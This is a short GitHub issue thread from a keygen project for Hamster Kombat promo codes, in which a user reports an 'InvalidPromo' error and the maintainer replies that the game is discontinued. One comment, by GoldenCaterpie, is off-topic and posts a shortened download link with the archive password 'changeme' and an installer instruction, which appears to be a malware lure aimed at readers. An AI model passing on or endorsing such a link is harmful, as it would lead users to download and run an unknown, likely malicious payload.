### ISSUE TITLE
InvalidPromo Error with register-event

### ISSUE THREAD

**Issue by ilshm** [Kovirum/hamster_kombat_bike_keygen_web#19]
I'm experiencing a persistent issue with `register-event` where it consistently returns the error: `{"error_code":"InvalidPromo","error_message":"Invalid promo parameter"}`. The error seems to occur every time, and I suspect it might be related to an incorrect eventOrigin. Additionally, this problem appears to be specifically tied to the My Clone Army game. What do you think could be causing this?

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Kovirum** [comment]
This game is no longer available in Hamster Kombat, so apparently the keys no longer work for it
